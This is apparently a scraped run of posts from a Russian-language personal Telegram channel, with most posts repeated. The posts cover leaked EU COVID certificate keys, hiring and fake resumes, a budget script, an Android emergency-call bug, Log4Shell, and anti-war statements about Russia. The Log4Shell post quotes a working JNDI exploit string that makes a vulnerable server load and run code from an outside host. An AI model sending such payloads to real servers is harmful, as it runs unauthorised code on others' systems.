🇪🇺 Возможно утекли приватные ключи, которыми подписываются онлайн-сертификаты о прививках в ЕС.
В сети гуляют два сертификата, выданные на имя Адольфа Гитлера и подписанные валидными ключами Польского и Французского минздравов. Журналисты заявляют, что связались с человеком, выдающим себя за автора подделок и предлагающего услуги по подделке сертификатов за 300 евро.
В целом есть два возможных объяснения: либо взломана (или просто незаконно использована) инфраструктура выдачи ковид-паспортов в двух странах одновременно, либо кто-то получил доступ к приватным ключам, которыми подписываются настоящие сертификаты.
Обсуждение в issues на GitHub.
В сети гуляют два сертификата, выданные на имя Адольфа Гитлера и подписанные валидными ключами Польского и Французского минздравов. Журналисты заявляют, что связались с человеком, выдающим себя за автора подделок и предлагающего услуги по подделке сертификатов за 300 евро.
В целом есть два возможных объяснения: либо взломана (или просто незаконно использована) инфраструктура выдачи ковид-паспортов в двух странах одновременно, либо кто-то получил доступ к приватным ключам, которыми подписываются настоящие сертификаты.
Обсуждение в issues на GitHub.
👩💻 Последние несколько дней интернет обсуждает фейковое резюме, получившее много предложений об интервью в крупных компаниях типа Reddit, Airtable, Bolt и Dropbox, в котором помимо прочего было написано, что разработчица является экспертом в Mia Khalifa и майнила Ethereum на корпоративных серверах.
Как раз этим летом у меня появилось немного опыта интервью в крупных западных компаниях, поэтому я бы хотел добавить свои две копейки:
— Компании такого размера получают сотни резюме на каждую позицию, а первичным отсеиванием обычно занимаются рекрутёры, у которых может не быть опыта, чтобы отделить Mia Khalifa от High Load (простите). На этом этапе они смотрят на какие-то базовые сигналы, которые могут провести кандидата на следующий уровень — обычно это телефонное интервью с рекрутёром, который, по моему опыту, будет уже довольно бегло ориентироваться в вашем резюме.
— В резюме из поста указан десятилетний опыт работы в Instagram, Zillow, LinkedIn и Microsoft. Сверху добавьте степень по Computer Science в Университете Беркли. Этого с головой достаточно, чтобы пройти скрининг и дойти до звонка. Поставь она в резюме компании, о которых ничего не известно, response rate упал бы на пару порядков (и это правда проблема, об этом ниже).
— Давайте теперь встанем на место рекрутёра и попробуем отличить названия покемонов от названий бигдата-технологий. Готовы отказать человеку с опытом работы в Instagram и Microsoft из-за того, что он указал Brainfuck в резюме?
— Даже если после скрининга и вступительного интервью с рекрутёром компания ничего не заметила, вас ждут ещё как минимум четыре раунда с настоящими менеджерами и разработчиками, которые тоже будут читать ваше резюме и задавать вопросы. Я думаю, любой fake it till you make it подход сломается на этом этапе. Но даже если нет, то соискателя ждёт background check, для которого вас попросят указать контакты ваших предыдущих работодателей, договоры, payslips и так далее, чтобы доказать, что вы не соврали в резюме.
Я сам столкнулся с тем, что с моим опытом работы в стартапах пробиться на интервью с живым человеком мне было сложно, вполне возможно потому что рекрутёрам намного проще иметь дело с людьми, которые уже работали в больших компаниях, знакомы с энтерпрайз-культурой и в целом более предсказуемы. Мне прямо говорили, что не готовы двигаться дальше так как сложно оценить мой менеджерский опыт, потому что в стартапе всё немного иначе, чем в большой корпорации. Кстати, разработчикам в этом плане проще, так как их уровень определить всё же легче.
Мой совет напоследок: обзаводитесь рефералами, то есть кем-то изнутри компании, кто напрямую вас посоветует, это поможет пройти входной фильтр, а так же учитесь продавать себя в том числе в резюме. Но это тема для отдельного поста.
Как раз этим летом у меня появилось немного опыта интервью в крупных западных компаниях, поэтому я бы хотел добавить свои две копейки:
— Компании такого размера получают сотни резюме на каждую позицию, а первичным отсеиванием обычно занимаются рекрутёры, у которых может не быть опыта, чтобы отделить Mia Khalifa от High Load (простите). На этом этапе они смотрят на какие-то базовые сигналы, которые могут провести кандидата на следующий уровень — обычно это телефонное интервью с рекрутёром, который, по моему опыту, будет уже довольно бегло ориентироваться в вашем резюме.
— В резюме из поста указан десятилетний опыт работы в Instagram, Zillow, LinkedIn и Microsoft. Сверху добавьте степень по Computer Science в Университете Беркли. Этого с головой достаточно, чтобы пройти скрининг и дойти до звонка. Поставь она в резюме компании, о которых ничего не известно, response rate упал бы на пару порядков (и это правда проблема, об этом ниже).
— Давайте теперь встанем на место рекрутёра и попробуем отличить названия покемонов от названий бигдата-технологий. Готовы отказать человеку с опытом работы в Instagram и Microsoft из-за того, что он указал Brainfuck в резюме?
— Даже если после скрининга и вступительного интервью с рекрутёром компания ничего не заметила, вас ждут ещё как минимум четыре раунда с настоящими менеджерами и разработчиками, которые тоже будут читать ваше резюме и задавать вопросы. Я думаю, любой fake it till you make it подход сломается на этом этапе. Но даже если нет, то соискателя ждёт background check, для которого вас попросят указать контакты ваших предыдущих работодателей, договоры, payslips и так далее, чтобы доказать, что вы не соврали в резюме.
Я сам столкнулся с тем, что с моим опытом работы в стартапах пробиться на интервью с живым человеком мне было сложно, вполне возможно потому что рекрутёрам намного проще иметь дело с людьми, которые уже работали в больших компаниях, знакомы с энтерпрайз-культурой и в целом более предсказуемы. Мне прямо говорили, что не готовы двигаться дальше так как сложно оценить мой менеджерский опыт, потому что в стартапе всё немного иначе, чем в большой корпорации. Кстати, разработчикам в этом плане проще, так как их уровень определить всё же легче.
Мой совет напоследок: обзаводитесь рефералами, то есть кем-то изнутри компании, кто напрямую вас посоветует, это поможет пройти входной фильтр, а так же учитесь продавать себя в том числе в резюме. Но это тема для отдельного поста.
🎧 Что же, AirPods 3-его поколения точно так же вываливаются из моих ушей, как и AirPods Pro, в связи с чем вопрос: не знаете, где можно пластику ушной раковины сделать, чтобы наушники нормально держались?
P.S. Мне скинули ссылки на компании, которые делают кастомные амбушюры, изучаю! (хотя пластика-то надёжнее будет!) (если Apple не поменяет дизайн в будущем)
P.S. Мне скинули ссылки на компании, которые делают кастомные амбушюры, изучаю! (хотя пластика-то надёжнее будет!) (если Apple не поменяет дизайн в будущем)
🦾 Бесконечно приятная часть бытия разработчиком
Последние 6 лет я записываю каждый потраченный рубль, злотый или евро в специальном приложении для ведения бюджета. Я начал это делать чтобы избавиться от кредитной карты, на которой к тому моменту скопился долг, который всё никак не хотел уменьшаться. От карты удалось избавиться, а привычка осталась.
Долгое время я чувствовал себя неуверенно, потому что вокруг меня никто подобным не занимался. Но потом моя психотерапевтка посоветовала мне книгу (к сожалению, она только на польском), взгляд автора которой оказался мне очень близок. С тех пор я научился не только откладывать достаточно денег, но и инвестировать их в ETF, а самое главное — мне пришло осознание, что именно этот путь правильный для меня. Это всё тема для отдельного большого разговора, если вам интересно почитать больше про личные финансы, нажмите на кнопочку внизу.
Сейчас возникло желание перевести бюджет в приложении из злотых в евро, а для этого надо обновить суммы во всех транзакциях. Когда я переезжал в Польшу никакого способа это сделать не было, поэтому мне пришлось создавать бюджет заново и потерять возможность строить красивые графики за все 6 лет. До сих пор такого способа всё так же не появилось, зато у приложения появилось API 😏
В общем, пара вечеров, и конвертирующий все транзакции скрипт готов! 314 строчек кода, несколько часов дебага, три неконсистентные транзакции (видимо привет от noSQL на бэкенде), и у меня красивый свежий бюджет в евро с историей за последние 4 года.
Ни с чем не сравнимое чувство удовольствия от решения «нерешаемой» проблемы, когда видишь, что все числа до и после сходятся до евроцента.
Последние 6 лет я записываю каждый потраченный рубль, злотый или евро в специальном приложении для ведения бюджета. Я начал это делать чтобы избавиться от кредитной карты, на которой к тому моменту скопился долг, который всё никак не хотел уменьшаться. От карты удалось избавиться, а привычка осталась.
Долгое время я чувствовал себя неуверенно, потому что вокруг меня никто подобным не занимался. Но потом моя психотерапевтка посоветовала мне книгу (к сожалению, она только на польском), взгляд автора которой оказался мне очень близок. С тех пор я научился не только откладывать достаточно денег, но и инвестировать их в ETF, а самое главное — мне пришло осознание, что именно этот путь правильный для меня. Это всё тема для отдельного большого разговора, если вам интересно почитать больше про личные финансы, нажмите на кнопочку внизу.
Сейчас возникло желание перевести бюджет в приложении из злотых в евро, а для этого надо обновить суммы во всех транзакциях. Когда я переезжал в Польшу никакого способа это сделать не было, поэтому мне пришлось создавать бюджет заново и потерять возможность строить красивые графики за все 6 лет. До сих пор такого способа всё так же не появилось, зато у приложения появилось API 😏
В общем, пара вечеров, и конвертирующий все транзакции скрипт готов! 314 строчек кода, несколько часов дебага, три неконсистентные транзакции (видимо привет от noSQL на бэкенде), и у меня красивый свежий бюджет в евро с историей за последние 4 года.
Ни с чем не сравнимое чувство удовольствия от решения «нерешаемой» проблемы, когда видишь, что все числа до и после сходятся до евроцента.
🚑 29 ноября на реддите появился пост с историей пользователя телефона Pixel 3 о том, что он не смог дозвониться до экстренных служб, когда у его бабушки случился инсульт. К счастью, у бабушки был городской телефон, так что связаться со скорой помощью удалось, однако пост привлёк необходимое внимание и многие пользователи смогли воспроизвести проблему.
8 декабря представители Google публично отреагировали на произошедшее. По их словам, проблема затрагивает пользователей Android 10+ с установленным, но не залогиненным приложением Microsoft Teams. Google пообещала выпустить фикс в обновлении 4 января.
Как описал Mishaal Rahman, проблема заключается в том, что приложение MS Teams ошибочно создавало PhoneAccount в операционной системе при каждом запуске приложения, причём только в случае, если пользователь не авторизован. PhoneAccount создают все приложения, которые так или иначе взаимодействуют со звонками, но из-за бага, предположительно, MS Teams создавала столько аккаунтов, что в момент, когда операционная система выбирала, через какой аккаунт осуществить звонок в экстренные службы, происходило переполнение Integer.
На скриншоте — фикс на стороне Android.
8 декабря представители Google публично отреагировали на произошедшее. По их словам, проблема затрагивает пользователей Android 10+ с установленным, но не залогиненным приложением Microsoft Teams. Google пообещала выпустить фикс в обновлении 4 января.
Как описал Mishaal Rahman, проблема заключается в том, что приложение MS Teams ошибочно создавало PhoneAccount в операционной системе при каждом запуске приложения, причём только в случае, если пользователь не авторизован. PhoneAccount создают все приложения, которые так или иначе взаимодействуют со звонками, но из-за бага, предположительно, MS Teams создавала столько аккаунтов, что в момент, когда операционная система выбирала, через какой аккаунт осуществить звонок в экстренные службы, происходило переполнение Integer.
На скриншоте — фикс на стороне Android.
🧪 Вы наверняка уже слышали про нашумевшую уязвимость Log4Shell, которая позволяла выполнять произвольный код на серверах Steam, AWS, Cloudflare, iCloud и миллионах других. Отдельно стоит отметить, что уязвимость находится в широкоиспользуемой open-source библиотеке, у главного мейнтейнера которой на момент открытия уязвимости было всего 5 спонсоров.
А вот самое красивое:
Так как выполнить можно абсолютно любой код, то отправив эту строчку на уязвимый сервер вы... пропатчите Log4j и пофиксите эту уязвимость с помощью самой уязвимости 🤯
А вот самое красивое:
${jndi:ldap://hotpatch.log4shell.com:1389/a}
Так как выполнить можно абсолютно любой код, то отправив эту строчку на уязвимый сервер вы... пропатчите Log4j и пофиксите эту уязвимость с помощью самой уязвимости 🤯
Forwarded from ExMuffin
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🧔Обновленная модель генератора HD портретов 👩🦳
Недавно мы в neural.love выкатили новый генератор лиц по исходному изображению, который был анонсирован в одном из предыдущих постов. Точность значительно возросла, в сравнении со старой моделью, однако немного просела скорость. Теперь на вычисление тратится чуть больше времени, но оно того стоит. По окончанию работы можно будет либо сравнить изменения, двигая шторкой, либо просто забрать результат, который придет на email. Протестировать можно по ссылке ниже:
https://neural.love/portraits
Недавно мы в neural.love выкатили новый генератор лиц по исходному изображению, который был анонсирован в одном из предыдущих постов. Точность значительно возросла, в сравнении со старой моделью, однако немного просела скорость. Теперь на вычисление тратится чуть больше времени, но оно того стоит. По окончанию работы можно будет либо сравнить изменения, двигая шторкой, либо просто забрать результат, который придет на email. Протестировать можно по ссылке ниже:
https://neural.love/portraits
🌍 Друзья, будьте осторожны с научным методом!
На видео: документалка Netflix про плоскоземельщиков, где что-то идёт не по плану.
На видео: документалка Netflix про плоскоземельщиков, где что-то идёт не по плану.
🚄 Если подключиться к Wi-Fi в поезде в Нидерландах, то приветственное окошко показывает следующие станции и время прибытия. Какой-то запредельный уровень внимания к деталям, нет?
Я уже неделю не могу найти слов, чтобы хоть как-то выразить то, что творится внутри.
Сначала я думал, что моя позиция и так ясна — я последовательно критиковал режим Путина в течение многих лет, в том числе публично. Не так давно вспомнил, что году в 2007 меня повесткой вызвали в Управление по борьбе с организованной преступностью, тогда ещё не было Центра Э, а полицейским очень хотелось найти повод наказать молодежь, увлекающуюся антифашистской андерграундной музыкой.
Но чем дальше, тем становится понятнее, что мы у очередного водораздела, у которого нужно громко заявить, что Путин — военный преступник. И я, и те молодые русские пацаны, которые сейчас холодные лежат на украинской земле, выросли с общим культурным кодом — война это ужасно, война разделила жизни наших прабабушек и прадедушек на «до» и «после». Мы выросли читая дневник Тани Савичевой, девочки из блокадного Ленинграда, который заканчивается душераздирающим «Умерли все, осталась одна Таня». Мы выросли в обществе, которое до сих пор не пережило послевоенную травму, и я не могу понять, как же так вышло.
Этого не должно было случиться. Этого не должно было повториться никогда. Мне бесконечно грустно и горько. Путин втянул Россию в войну, которая никому, кроме него не нужна. Путин взрывает дома, теперь уже без всяких сомнений и по-настоящему.
Сначала я думал, что моя позиция и так ясна — я последовательно критиковал режим Путина в течение многих лет, в том числе публично. Не так давно вспомнил, что году в 2007 меня повесткой вызвали в Управление по борьбе с организованной преступностью, тогда ещё не было Центра Э, а полицейским очень хотелось найти повод наказать молодежь, увлекающуюся антифашистской андерграундной музыкой.
Но чем дальше, тем становится понятнее, что мы у очередного водораздела, у которого нужно громко заявить, что Путин — военный преступник. И я, и те молодые русские пацаны, которые сейчас холодные лежат на украинской земле, выросли с общим культурным кодом — война это ужасно, война разделила жизни наших прабабушек и прадедушек на «до» и «после». Мы выросли читая дневник Тани Савичевой, девочки из блокадного Ленинграда, который заканчивается душераздирающим «Умерли все, осталась одна Таня». Мы выросли в обществе, которое до сих пор не пережило послевоенную травму, и я не могу понять, как же так вышло.
Этого не должно было случиться. Этого не должно было повториться никогда. Мне бесконечно грустно и горько. Путин втянул Россию в войну, которая никому, кроме него не нужна. Путин взрывает дома, теперь уже без всяких сомнений и по-настоящему.
❤️ В России за распространение «фейков» про «специальную операцию» заблокирован TJ, над которым мы с командой вместе работали больше 10 лет (я покинул компанию прошлым летом). Насколько я понимаю, это был последний крупный объективный новостной ресурс не попавший под блокировки или маркировку «иностранным агентом».